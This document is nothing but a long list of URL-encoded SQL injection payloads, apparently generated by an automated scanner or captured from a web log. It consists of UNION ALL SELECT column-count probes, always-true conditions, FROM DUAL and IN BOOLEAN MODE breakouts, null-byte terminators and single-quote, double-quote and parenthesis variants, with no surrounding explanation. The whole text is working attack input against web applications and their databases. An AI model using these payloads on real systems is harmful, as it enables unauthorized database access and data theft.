1%27%20%2B%20%28SELECT%20%27azXP%27%20FROM%20DUAL%20WHERE%202424%3D2424%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jJkH%27%20FROM%20DUAL%20WHERE%205103%3D5103%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27OyvE%27%20FROM%20DUAL%20WHERE%208114%3D8114%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dGdL%27%20FROM%20DUAL%20WHERE%207392%3D7392%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Kwzi%27%20FROM%20DUAL%20WHERE%205211%3D5211%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ClvX%27%20WHERE%204070%3D4070%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27SmoR%27%20WHERE%201796%3D1796%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27nBjD%27%20WHERE%207865%3D7865%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27elqF%27%20WHERE%208030%3D8030%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27axrC%27%20WHERE%204817%3D4817%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VLKJ%27%20WHERE%206471%3D6471%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27fmcD%27%20WHERE%208233%3D8233%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AScJ%27%20WHERE%209763%3D9763%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Ipaa%27%20WHERE%204446%3D4446%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27zUDQ%27%20WHERE%205974%3D5974%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -6931%29%20UNION%20ALL%20SELECT%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%2C%203319%00 -4140%29%20UNION%20ALL%20SELECT%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%00 -4839%29%20UNION%20ALL%20SELECT%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%00 -8748%29%20UNION%20ALL%20SELECT%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%00 -7711%29%20UNION%20ALL%20SELECT%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%2C%208497%00 -7403%29%20UNION%20ALL%20SELECT%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%00 -4074%29%20UNION%20ALL%20SELECT%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%2C%209010%00 -6735%29%20UNION%20ALL%20SELECT%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%2C%208403%00 -9138%29%20UNION%20ALL%20SELECT%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%2C%207329%00 -6459%29%20UNION%20ALL%20SELECT%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%2C%208269%00 -3688%27%29%20UNION%20ALL%20SELECT%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%2C%202250%00 -1193%27%29%20UNION%20ALL%20SELECT%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%2C%208252%00 -6035%27%29%20UNION%20ALL%20SELECT%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%2C%204099%00 -1130%27%29%20UNION%20ALL%20SELECT%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%2C%203440%00 -4013%27%29%20UNION%20ALL%20SELECT%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%2C%208234%00 -9985%27%29%20UNION%20ALL%20SELECT%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%2C%204087%00 -5123%27%29%20UNION%20ALL%20SELECT%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%00 -1113%27%29%20UNION%20ALL%20SELECT%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%2C%208302%00 -9560%27%29%20UNION%20ALL%20SELECT%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%00 -5152%27%29%20UNION%20ALL%20SELECT%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%2C%204974%00 -9816%27%20UNION%20ALL%20SELECT%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%2C%203715%00 -3858%27%20UNION%20ALL%20SELECT%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%2C%204907%00 -7040%27%20UNION%20ALL%20SELECT%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%2C%205788%00 -4886%27%20UNION%20ALL%20SELECT%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%2C%209833%00 -2715%27%20UNION%20ALL%20SELECT%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%2C%203841%00 -8587%27%20UNION%20ALL%20SELECT%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%2C%207175%00 -3332%27%20UNION%20ALL%20SELECT%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%2C%209585%00 -8077%27%20UNION%20ALL%20SELECT%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%2C%202686%00 -4974%27%20UNION%20ALL%20SELECT%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%2C%202891%00 -9893%27%20UNION%20ALL%20SELECT%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%2C%202145%00 -1479%22%20UNION%20ALL%20SELECT%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%00 -3274%22%20UNION%20ALL%20SELECT%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%00 -1239%22%20UNION%20ALL%20SELECT%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%2C%203786%00 -1841%22%20UNION%20ALL%20SELECT%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%2C%203542%00 -4380%22%20UNION%20ALL%20SELECT%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%2C%201106%00 -9248%22%20UNION%20ALL%20SELECT%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%2C%201814%00 -8236%22%20UNION%20ALL%20SELECT%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%00 -4322%22%20UNION%20ALL%20SELECT%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%00 -3234%22%20UNION%20ALL%20SELECT%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%2C%203076%00 -3362%22%20UNION%20ALL%20SELECT%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%00 -5167%29%20UNION%20ALL%20SELECT%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%2C%206103%00%20AND%20%284335%3D4335 -6214%29%20UNION%20ALL%20SELECT%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%2C%208826%00%20AND%20%289620%3D9620 -9973%29%20UNION%20ALL%20SELECT%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%2C%202524%00%20AND%20%289336%3D9336 -5330%29%20UNION%20ALL%20SELECT%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%2C%209290%00%20AND%20%283343%3D3343 -8558%29%20UNION%20ALL%20SELECT%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%2C%203875%00%20AND%20%289903%3D9903 -1300%29%20UNION%20ALL%20SELECT%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%2C%204212%00%20AND%20%284719%3D4719 -5735%29%20UNION%20ALL%20SELECT%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%2C%201986%00%20AND%20%283576%3D3576 